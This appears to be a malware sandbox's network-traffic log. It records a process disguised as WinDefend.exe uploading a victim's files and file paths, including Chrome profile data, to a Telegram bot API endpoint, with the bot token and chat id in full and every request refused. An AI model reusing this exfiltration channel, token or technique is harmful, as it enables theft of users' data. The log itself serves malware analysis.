2024-05-23 13:34:53 UTC	93	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 31 39 32 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 31 39 32 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=192.png; filename*=utf-8''192.png
2024-05-23 13:34:53 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c0 00 00 00 c0 08 06 00 00 00 52 dc 6c 07 00 00 1a f2 49 44 41 54 78 9c ed 9d 79 90 1c 57 7d c7 bf bf d7 3d 33 bb 2b 69 ef d5 22 c9 3a d6 12 b6 2c 5f 60 39 72 2c 0c c6 07 f8 0e 3e ca 18 63 62 48 28 94 04 82 43 0a 5c 39 8b 82 22 a1 12 3b a4 a8 84 54 8a e0 22 1c 36 42 36 18 8c 85 30 32 c6 32 f8 36 3e 30 f6 12 db 3a 56 da fb 3e 67 77 a6 8f f7 cb 1f b3 b3 3b bb 3b 3b e7 eb 63 56 ef 53 a5 d2 ce f4 eb f7 fb 75 f7 f7 f7 fa f7 8e ee 01 34 1a 8d 46 a3 d1 68 34 1a 8d 46 a3 d1 68 34 1a 8d 46 a3 d1 68 34 1a 8d 46 a3 d1 68 34 1a 8d 46 a3 d1 68 34 1a 8d 46 a3 d1 68 34 1a 8d 46 a3 d1 68 34 1a 8d 46 a3 d1 68 34 1a 8d 46 a3 d1 68 34 1a 8d 46 a3 d1 68 34 1a 4d 10 50 d0 0e ac 74 46 6e be bc ce 4d 9a 6f 5b fc bd 69 8a Data Ascii: PNGIHDRRlIDATxyW}=3+i":,_`9r,>cbH(C\9";T"6B60226>0:V>gw;;;cVSu4Fh4Fh4Fh4Fh4Fh4Fh4Fh4Fh4Fh4Fh4MPtFnMo[i
2024-05-23 13:34:53 UTC	2859	OUT	Data Raw: 89 81 84 e9 12 39 06 73 b8 02 41 e9 08 51 b1 a6 43 2a 06 d7 81 fd e8 41 24 7f fa 63 38 87 df 4a 09 df 29 73 26 b7 18 7c 6a fd fd 4c 7f 00 c0 34 18 3d 00 36 29 ab b1 54 54 0b 6f a5 08 1f 80 fd e4 13 48 ee fb 1e 9c 63 47 52 93 58 96 85 82 0e 50 b7 fe 39 8a a4 ca 04 db f2 7b 75 f2 57 88 f8 ed e7 9e 46 f2 81 bd 70 de 7c 03 b2 bf 6f 56 f8 80 ef e2 5f a1 ad bf 04 91 69 83 5d df 7e 22 c6 f3 e1 d1 12 76 09 a1 f8 9d 97 5f 44 f2 47 f7 c3 79 f5 b7 70 07 fa c0 33 89 a0 5d 5a 59 a4 af 39 f1 a8 69 48 ee 82 a0 36 cf 8c f8 81 5f c2 2f 67 65 6a 01 38 6f bd 01 eb fe bd b0 7f f3 1c dc c1 01 70 3c 9e cd 89 fc 15 ad d4 d6 bf 20 0a af 48 30 8f 99 4c 44 15 9b 07 96 bc 4a ba 44 f1 7b 84 db dd 89 e4 7d df 86 fd fc 33 90 83 83 90 13 cb cd de fa 9c d3 87 4d 17 8a fd b1 99 84 29 18 Data Ascii: 9sAQC*A$c8J)s&\|jL4=6)TToHcGRXP9{uWFp\|oV_i]~"v_DGyp3]ZY9iH6_/gej8op< H0LDJD{}3M)
2024-05-23 13:34:53 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 32 39 61 62 63 62 65 32 2d 64 66 33 31 2d 34 32 36 31 2d 38 35 66 66 2d 34 66 39 38 36 63 30 66 34 65 35 36 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --29abcbe2-df31-4261-85ff-4f986c0f4e56Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:34:53 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:34:53 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 32 39 61 62 63 62 65 32 2d 64 66 33 31 2d 34 32 36 31 2d 38 35 66 66 2d 34 66 39 38 36 63 30 66 34 65 35 36 2d 2d 0d 0a Data Ascii: --29abcbe2-df31-4261-85ff-4f986c0f4e56--
2024-05-23 13:34:53 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:53 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.5	61138	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:53 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 177 Expect: 100-continue
2024-05-23 13:34:53 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:53 UTC	177	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 53 69 67 6e 48 65 72 65 2e 70 64 66 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 70 6c 75 67 5f 69 6e 73 25 35 43 41 6e 6e 6f 74 61 74 69 6f 6e 73 25 35 43 53 74 61 6d 70 73 25 35 43 45 4e 55 25 35 43 53 69 67 6e 48 65 72 65 2e 70 64 66 25 30 41 53 69 7a 65 25 33 41 2b 33 39 2b 4b 42 Data Ascii: chat_id=1655240967&text=File%3A+SignHere.pdf%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5Cplug_ins%5CAnnotations%5CStamps%5CENU%5CSignHere.pdf%0ASize%3A+39+KB
2024-05-23 13:34:53 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:53 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.5	61139	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:54 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 200 Expect: 100-continue
2024-05-23 13:34:54 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:54 UTC	200	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 63 6f 72 65 5f 69 63 6f 6e 73 5f 72 65 74 69 6e 61 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 73 74 61 74 69 63 25 35 43 69 6d 61 67 65 73 25 35 43 63 6f 72 65 5f 69 63 6f 6e 73 5f 72 65 74 69 6e 61 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 36 35 2b 4b 42 Data Ascii: chat_id=1655240967&text=File%3A+core_icons_retina.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Cstatic%5Cimages%5Ccore_icons_retina.png%0ASize%3A+65+KB
2024-05-23 13:34:54 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:54 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.5	61141	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:54 UTC	234	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="a49c2171-c60b-4e28-92ee-4734b85d93be" Host: api.telegram.org Content-Length: 41054 Expect: 100-continue
2024-05-23 13:34:54 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:54 UTC	40	OUT	Data Raw: 2d 2d 61 34 39 63 32 31 37 31 2d 63 36 30 62 2d 34 65 32 38 2d 39 32 65 65 2d 34 37 33 34 62 38 35 64 39 33 62 65 0d 0a Data Ascii: --a49c2171-c60b-4e28-92ee-4734b85d93be
2024-05-23 13:34:54 UTC	103	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 53 69 67 6e 48 65 72 65 2e 70 64 66 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 53 69 67 6e 48 65 72 65 2e 70 64 66 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=SignHere.pdf; filename*=utf-8''SignHere.pdf
2024-05-23 13:34:54 UTC	4096	OUT	Data Raw: 25 50 44 46 2d 31 2e 34 0d 25 e2 e3 cf d3 0d 0a 38 33 20 30 20 6f 62 6a 0d 3c 3c 20 0d 2f 4c 69 6e 65 61 72 69 7a 65 64 20 31 20 0d 2f 4f 20 38 36 20 0d 2f 48 20 5b 20 39 31 35 20 32 36 39 20 5d 20 0d 2f 4c 20 34 30 37 32 36 20 0d 2f 45 20 35 37 35 34 20 0d 2f 4e 20 35 20 0d 2f 54 20 33 38 39 34 38 20 0d 3e 3e 20 0d 65 6e 64 6f 62 6a 0d 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 72 65 66 0d 38 33 20 32 32 20 0d 30 30 30 30 30 30 30 30 31 36 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 30 37 38 38 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 30 38 37 36 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 31 31 38 34 Data Ascii: %PDF-1.4%83 0 obj<< /Linearized 1 /O 86 /H [ 915 269 ] /L 40726 /E 5754 /N 5 /T 38948 >> endobj xref83 22 0000000016 00000 n0000000788 00000 n0000000876 00000 n0000001184
2024-05-23 13:34:54 UTC	4096	OUT	Data Raw: 2f 43 72 65 61 74 6f 72 56 65 72 73 69 6f 6e 20 31 30 20 0d 2f 43 6f 6e 74 61 69 6e 65 72 56 65 72 73 69 6f 6e 20 39 20 0d 2f 41 49 4d 65 74 61 44 61 74 61 20 31 30 32 20 30 20 52 20 0d 3e 3e 20 0d 65 6e 64 6f 62 6a 0d 31 30 32 20 30 20 6f 62 6a 0d 3c 3c 20 2f 4c 65 6e 67 74 68 20 31 31 33 38 20 3e 3e 20 0d 73 74 72 65 61 6d 0d 0a 25 21 50 53 2d 41 64 6f 62 65 2d 33 2e 30 20 0d 25 25 43 72 65 61 74 6f 72 3a 20 41 64 6f 62 65 20 49 6c 6c 75 73 74 72 61 74 6f 72 28 52 29 20 31 30 2e 30 0d 25 25 41 49 38 5f 43 72 65 61 74 6f 72 56 65 72 73 69 6f 6e 3a 20 31 30 2e 30 0d 25 25 46 6f 72 3a 20 28 4b 65 6c 6c 69 65 20 53 75 74 68 65 72 6c 61 6e 64 29 20 28 41 64 6f 62 65 20 53 79 73 74 65 6d 73 29 0d 25 25 54 69 74 6c 65 3a 20 28 55 6e 74 69 74 6c 65 64 2d 31 29 Data Ascii: /CreatorVersion 10 /ContainerVersion 9 /AIMetaData 102 0 R >> endobj102 0 obj<< /Length 1138 >> stream%!PS-Adobe-3.0 %%Creator: Adobe Illustrator(R) 10.0%%AI8_CreatorVersion: 10.0%%For: (Kellie Sutherland) (Adobe Systems)%%Title: (Untitled-1)
2024-05-23 13:34:54 UTC	4096	OUT	Data Raw: 74 72 65 61 6d 0d 0a 25 21 50 53 2d 41 64 6f 62 65 2d 33 2e 30 20 0d 25 25 43 72 65 61 74 6f 72 3a 20 41 64 6f 62 65 20 49 6c 6c 75 73 74 72 61 74 6f 72 28 52 29 20 31 30 2e 30 0d 25 25 41 49 38 5f 43 72 65 61 74 6f 72 56 65 72 73 69 6f 6e 3a 20 31 30 2e 30 0d 25 25 46 6f 72 3a 20 28 4b 65 6c 6c 69 65 20 53 75 74 68 65 72 6c 61 6e 64 29 20 28 41 64 6f 62 65 20 53 79 73 74 65 6d 73 29 0d 25 25 54 69 74 6c 65 3a 20 28 55 6e 74 69 74 6c 65 64 2d 33 29 0d 25 25 43 72 65 61 74 69 6f 6e 44 61 74 65 3a 20 31 2f 38 2f 30 33 20 31 30 3a 31 33 20 41 4d 0d 25 25 42 6f 75 6e 64 69 6e 67 42 6f 78 3a 20 32 35 39 20 33 38 32 20 33 35 35 20 34 30 39 0d 25 25 48 69 52 65 73 42 6f 75 6e 64 69 6e 67 42 6f 78 3a 20 32 35 39 2e 37 32 34 36 20 33 38 32 2e 39 36 38 38 20 33 35 Data Ascii: tream%!PS-Adobe-3.0 %%Creator: Adobe Illustrator(R) 10.0%%AI8_CreatorVersion: 10.0%%For: (Kellie Sutherland) (Adobe Systems)%%Title: (Untitled-3)%%CreationDate: 1/8/03 10:13 AM%%BoundingBox: 259 382 355 409%%HiResBoundingBox: 259.7246 382.9688 35
2024-05-23 13:34:54 UTC	4096	OUT	Data Raw: 53 20 2f 44 65 76 69 63 65 52 47 42 20 0d 3e 3e 20 0d 65 6e 64 6f 62 6a 0d 32 36 20 30 20 6f 62 6a 0d 3c 3c 20 0d 2f 50 72 69 76 61 74 65 20 32 37 20 30 20 52 20 0d 2f 4c 61 73 74 4d 6f 64 69 66 69 65 64 20 28 44 3a 32 30 30 33 30 31 30 38 31 30 31 34 31 37 2d 30 38 27 30 30 27 29 0d 3e 3e 20 0d 65 6e 64 6f 62 6a 0d 32 37 20 30 20 6f 62 6a 0d 3c 3c 20 0d 2f 43 72 65 61 74 6f 72 56 65 72 73 69 6f 6e 20 31 30 20 0d 2f 43 6f 6e 74 61 69 6e 65 72 56 65 72 73 69 6f 6e 20 39 20 0d 2f 41 49 4d 65 74 61 44 61 74 61 20 32 38 20 30 20 52 20 0d 3e 3e 20 0d 65 6e 64 6f 62 6a 0d 32 38 20 30 20 6f 62 6a 0d 3c 3c 20 2f 4c 65 6e 67 74 68 20 31 31 33 35 20 3e 3e 20 0d 73 74 72 65 61 6d 0d 0a 25 21 50 53 2d 41 64 6f 62 65 2d 33 2e 30 20 0d 25 25 43 72 65 61 74 6f 72 3a 20 Data Ascii: S /DeviceRGB >> endobj26 0 obj<< /Private 27 0 R /LastModified (D:20030108101417-08'00')>> endobj27 0 obj<< /CreatorVersion 10 /ContainerVersion 9 /AIMetaData 28 0 R >> endobj28 0 obj<< /Length 1135 >> stream%!PS-Adobe-3.0 %%Creator:
2024-05-23 13:34:54 UTC	4096	OUT	Data Raw: 20 31 20 31 32 36 36 20 39 30 37 20 32 36 20 30 20 31 20 37 20 34 32 20 30 20 30 20 31 20 31 20 31 20 30 0d 25 41 49 35 5f 4f 70 65 6e 56 69 65 77 4c 61 79 65 72 73 3a 20 37 0d 25 25 50 61 67 65 4f 72 69 67 69 6e 3a 33 30 20 33 31 0d 25 25 41 49 33 5f 50 61 70 65 72 52 65 63 74 3a 2d 33 30 20 37 36 31 20 35 38 32 20 2d 33 31 0d 25 25 41 49 33 5f 4d 61 72 67 69 6e 3a 33 30 20 2d 33 31 20 2d 33 30 20 33 31 0d 25 41 49 37 5f 47 72 69 64 53 65 74 74 69 6e 67 73 3a 20 37 32 20 38 20 37 32 20 38 20 31 20 30 20 30 2e 38 20 30 2e 38 20 30 2e 38 20 30 2e 39 20 30 2e 39 20 30 2e 39 0d 25 41 49 39 5f 46 6c 61 74 74 65 6e 3a 20 30 0d 25 25 45 6e 64 43 6f 6d 6d 65 6e 74 73 0d 65 6e 64 73 74 72 65 61 6d 0d 65 6e 64 6f 62 6a 0d 34 33 20 30 20 6f 62 6a 0d 3c 3c 20 0d 2f Data Ascii: 1 1266 907 26 0 1 7 42 0 0 1 1 1 0%AI5_OpenViewLayers: 7%%PageOrigin:30 31%%AI3_PaperRect:-30 761 582 -31%%AI3_Margin:30 -31 -30 31%AI7_GridSettings: 72 8 72 8 1 0 0.8 0.8 0.8 0.9 0.9 0.9%AI9_Flatten: 0%%EndCommentsendstreamendobj43 0 obj<< /
2024-05-23 13:34:54 UTC	4096	OUT	Data Raw: 50 91 b1 df a8 7c c2 f3 8d d5 80 00 59 5c 78 af 44 f3 c8 9c 7b 37 83 f8 91 af a6 0f 97 9c 39 aa fc 4b d5 90 5f 2c 73 54 f9 63 d5 90 5f 2c 73 54 f9 c1 8a e5 13 1d 5f de d8 83 bd b8 14 f9 48 aa d9 2b cf 23 73 d0 73 ca 0c fc 37 1d 63 7f d1 b1 db 6e 50 fe d9 12 e4 8f 56 43 7e 9f 43 7e c0 21 df 57 a2 7c 70 7f 66 df ed 0f f7 ac 2b 1f cf 08 67 ce 62 e2 e5 2a ed b6 ff 17 55 47 91 df e9 94 6f db ed a9 85 43 c8 93 b5 e5 c7 ff 36 8a cf cc ff 75 3f 05 fe a6 55 9d aa c8 2f 65 b7 ad 8a fc a2 55 67 0d f9 e4 ff e0 1a fe 11 f8 94 39 3b 13 a6 57 31 bf 5d 75 2a 90 ef 71 c8 77 83 35 fc 2f 25 3e e2 83 6d a1 cc d9 ae 3a 95 ec b6 79 f2 6d bb 2d b5 70 a0 a0 7f eb b3 0b 78 7f ee c6 be 72 32 e7 f1 54 9d e7 9e fb 29 30 a6 61 7b 6c d6 3c cd 2f a3 51 94 84 d1 59 73 94 5f 5e d5 87 c2 Data Ascii: P\|Y\xD{79K_,sTc_,sT_H+#ss7cnPVC~C~!W\|pf+gbUGoC6u?U/eUg9;W1]uqw5/%>m:ym-pxr2T)0a{l</QYs_^
2024-05-23 13:34:54 UTC	4096	OUT	Data Raw: a6 c9 65 f9 77 7a 30 ea 30 f8 e5 82 90 af 54 05 1e 17 a4 9d d2 fb 54 2b fc 2a e2 43 eb 84 ff 4e 51 fa 65 2f 97 6c aa f9 90 0f db 27 da 7c d4 19 3f 76 06 56 10 78 00 df 76 75 a4 b4 87 41 1e 86 3f ee ab e9 a8 91 30 85 7b 5b 3e e4 93 db cc 35 76 a0 90 ef 6e 9f 47 9f f5 75 2b 47 c8 a4 da c7 b5 4c 1d f2 2f 20 67 22 ea 60 f1 4b dd ef b6 ca f6 52 c3 63 d4 02 be d3 3a d5 ef d1 71 4d 3a 67 f8 67 35 e0 fb 6b c0 8f 60 fc 6b 84 f9 a7 e3 f6 7d fb 55 d9 58 09 f7 3b da 23 51 87 87 4f db 2b c0 4f 8c a8 a7 27 44 ce c9 56 47 cd 92 ac 2b 98 b6 fd fa 6a d3 29 46 03 a6 2d 12 8e 16 17 75 f8 1d 16 42 26 d1 26 f8 30 fc c1 9f ea 60 05 b6 83 9c 39 58 9b d5 83 b4 75 cc cd 9c d1 f6 7d 7b 33 aa 20 0f c3 1f 34 90 b5 34 42 be 14 7e 52 98 2a d9 ca 1c f3 d9 0e 2b a6 6d c9 7c 4f 5a 41 c8 Data Ascii: ewz00TT+CNQe/l'\|?vVxvuA?0{[>5vnGu+GL/ g"`KRc:qM:gg5k`k}UX;#QO+O'DVG+j)F-uB&&0`9Xu}{3 44B~R+m\|OZA
2024-05-23 13:34:54 UTC	4096	OUT	Data Raw: 1f f8 24 5f 2c f9 e2 85 c5 ff 79 7d 6e 79 18 db 2e 71 c2 a5 aa 83 65 4f 25 87 bf 30 83 aa 43 69 cf aa a6 d0 73 70 c8 a5 6f 7f 6b 52 c1 3c 21 56 7d 98 27 a8 f0 e0 78 85 35 4f 63 fe 2a f4 f5 dc 65 94 d3 98 6d b8 79 b1 2b da df 17 ac 79 2a 3f fc c5 fc 0b 55 c7 46 be 59 01 5a d3 22 bb f2 8f 0b 9b f2 eb 46 13 be 6d 89 57 f5 4f d5 e1 03 9f 7a 26 8e 57 73 55 32 86 52 86 aa 03 f9 28 99 7b f3 13 b1 db ee 9d 96 d8 d1 33 6b 2c 6f e7 4e 9d 23 f7 07 c8 9c ed 66 0d 9d 6d b7 a7 46 6f 4b 8d 3e 5e 6a a4 dd f6 58 49 12 cc 03 64 0e cc b3 b4 af 48 c6 b2 df 6a 54 ec 4e 53 33 f9 68 f8 a5 86 3f a4 aa b6 18 e4 28 99 f0 df 62 52 6e 4e 8c 40 c9 14 08 df 94 10 8e c0 ff 28 4b bb 31 3e 14 40 3e 32 ff 70 86 7a 83 2e 04 81 7f 28 3d 6a 67 62 d8 fa d8 a0 f5 31 84 ec d7 31 b2 77 0c 11 c7 Data Ascii: $_,y}ny.qeO%0CispokR<!V}'x5Ocemy+y?UFYZ"FmWOz&WsU2R({3k,oN#fmFoK>^jXIdHjTNS3h?(bRnN@(K1>@>2pz.(=jgb11w
2024-05-23 13:34:54 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:54 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
101	192.168.2.5	61140	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:54 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 350 Expect: 100-continue
2024-05-23 13:34:54 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:54 UTC	350	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 32 35 36 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 44 6f 63 75 6d 65 6e 74 73 2b 61 6e 64 2b 53 65 74 74 69 6e 67 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 47 6f 6f 67 6c 65 25 35 43 43 68 72 6f 6d 65 25 35 43 55 73 65 72 2b 44 61 74 61 25 35 43 44 65 66 61 75 6c 74 25 35 43 57 65 62 2b 41 70 70 6c 69 63 61 Data Ascii: chat_id=1655240967&text=File%3A+256.png%0APath%3A+C%3A%5CDocuments+and+Settings%5Cuser%5CAppData%5CLocal%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CGoogle%5CChrome%5CUser+Data%5CDefault%5CWeb+Applica
2024-05-23 13:34:54 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:54 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.5	61142	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:55 UTC	234	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="4270b7f1-9a21-4935-967d-bf3e59be0813" Host: api.telegram.org Content-Length: 67078 Expect: 100-continue
2024-05-23 13:34:55 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:55 UTC	40	OUT	Data Raw: 2d 2d 34 32 37 30 62 37 66 31 2d 39 61 32 31 2d 34 39 33 35 2d 39 36 37 64 2d 62 66 33 65 35 39 62 65 30 38 31 33 0d 0a Data Ascii: --4270b7f1-9a21-4935-967d-bf3e59be0813
2024-05-23 13:34:55 UTC	121	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 63 6f 72 65 5f 69 63 6f 6e 73 5f 72 65 74 69 6e 61 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 63 6f 72 65 5f 69 63 6f 6e 73 5f 72 65 74 69 6e 61 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=core_icons_retina.png; filename*=utf-8''core_icons_retina.png
2024-05-23 13:34:55 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 78 00 00 02 58 08 06 00 00 00 d8 00 8e 8f 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 00 15 74 45 58 74 43 72 65 61 74 69 6f 6e 20 54 69 6d 65 00 34 2f 32 37 2f 31 32 fd 22 3d ed 00 00 00 1c 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 46 69 72 65 77 6f 72 6b 73 20 43 53 36 e8 bc b2 8c 00 00 20 00 49 44 41 54 78 9c ec dd 7b 7c 53 e5 fd 07 f0 cf 69 41 8a 72 f7 06 3a b5 f5 f2 9b 9d bf 4d 60 4e ab 73 72 99 a1 e2 d0 80 32 a7 4e 10 b7 85 39 af 6c 9a c0 c3 4f 2b b0 ad 0f 24 6e e0 65 a0 44 07 8a 88 f3 36 a2 dc 62 9d e0 9c 52 77 a9 e8 bc e0 35 55 14 ab a2 54 45 5a 6e 3d bf 3f 9e 13 9b 9c 24 cd ed a4 c9 49 3e ef d7 ab 2f 9b Data Ascii: PNGIHDRxXsBIT\|dpHYs~tEXtCreation Time4/27/12"=tEXtSoftwareAdobe Fireworks CS6 IDATx{\|SiAr:M`Nsr2N9lO+$neD6bRw5UTEZn=?$I>/
